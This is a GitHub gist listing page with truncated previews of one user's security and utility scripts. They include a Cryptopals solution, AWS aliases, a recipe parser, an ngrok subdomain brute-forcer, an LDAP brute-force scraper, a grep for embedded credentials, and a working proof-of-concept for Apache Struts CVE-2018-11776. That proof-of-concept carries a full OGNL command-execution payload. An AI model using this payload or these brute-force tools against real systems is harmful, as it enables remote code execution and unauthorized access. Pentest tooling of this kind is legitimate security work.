This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from selenium import webdriver | |
| import argparse | |
| import re | |
| from time import sleep | |
| def get_links(url): | |
| options = webdriver.ChromeOptions() | |
| options.add_argument('--ignore-certificate-errors') |
atucom
/ gist:b4adc9cae195e4a6ac5b2ee86386c51c
Created
January 15, 2020 21:52
Solution to Cryptopals Challenge 4
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import langdetect | |
| from langdetect import detect | |
| def ascii_hex_to_bytes(hex_input): | |
| return bytearray.fromhex(hex_input) | |
| with open('Downloads/cryptopals-challenge4.txt') as f: | |
| xorinput=f.readlines() | |
| xor2 = [line.strip() for line in xorinput] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| #brute ngrok's subdomain pattern | |
| import requests | |
| import itertools | |
| for sub in itertools.product("0123456789abcdef", repeat=8): | |
| host = "".join(sub) + ".ngrok.io" | |
| print(host) | |
| reply = requests.get("http://18.188.14.65", headers={"Host": host}) | |
| if "Tunnel " + host + " not found" not in reply.text: |
atucom
/ gist:179afbe6be6d47fa05debc61eb77abce
Created
March 13, 2019 16:26
grep for user:pass@example.com patterns
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # user : pass @ whatever | |
| grep -Pi '[^\s]*:[^\s]*@[^\s]*' * --color |
atucom
/ gist:ff6cecf38ac999c9223187a7cae55c41
Created
January 29, 2019 20:10
List EC2 and Lightsail boxes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| List lightsail boxes: | |
| alias aws_lightsail_list='aws lightsail get-instances --query="instances[*].{Name:name, IP:publicIpAddress, Username:username, State:state.name, key:sshKeyName}" --output=table' | |
| List ec2 boxes: | |
| alias aws_ec2_list='aws ec2 describe-instances --query="Reservations[*].Instances[*].{Launched:LaunchTime, State:State.Name, Key:KeyName, IP:PublicIpAddress, Tags:Tags[0].Value, Region:Placement.AvailabilityZone}" --output=table' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import ssl | |
| def is_SSL_enabled(ip, port): | |
| """ | |
| Attempts a SSL connection to the specified ip:port | |
| Note: Does not handle STARTTLS yet | |
| returns True if handshake was successful, false if not | |
| """ | |
| context = ssl.create_default_context() |
atucom
/ gitRepoDownloader.py
Created
August 30, 2018 16:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # @atucom 2018 | |
| # This script, given credentials and a host, will clone all the git repos | |
| # from a bitbucket server into appropriately named project folders locally. | |
| # Just update the username, password, and host, and let it go. | |
| import stashy | |
| import os | |
| import subprocess |
atucom
/ ldapscraper.py
Created
August 30, 2018 02:27
Brute force LDAP CN entries and download them locally
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # @atucom 2018 | |
| # This tool brutes all cn attributes from ldap recursively. | |
| # Additionally, if a result limit is exceeded, it will drill down farther and keep going | |
| import os | |
| import subprocess | |
| import string |
atucom
/ CVE-2018-11776-PoC.py
Last active
July 16, 2019 01:46
Simple PoC for the Apache Struts vuln CVE-2018-11776
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| # Simple PoC for the Apache Struts vuln CVE-2018-11776 | |
| # this currently works on the struts showcase app but can easily be adapted to anything | |
| # Thanks to https://github.com/jas502n/St2-057 for working OGNL statements :D (proper URL encoding REALLY matters) | |
| # @atucom | |
| def runCMD(command): | |
| target = 'http://192.168.235.181:8080/struts3-showcase/' | |
| payload = '%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27' + command + '%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action' | |
| return requests.get(target + payload).text |
atucom
/ parsehtml.py
Created
August 2, 2018 22:42
Parse HTML for ingredient list, customized for homechef
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from lxml import html | |
| import lxml | |
| import os | |
| from collections import defaultdict | |
| def getIngredients(htmlFile): | |
| # Returns the ingredients from an html file | |
| try: | |
| tree = html.fromstring(htmlFile) | |
| except lxml.etree.ParserError: |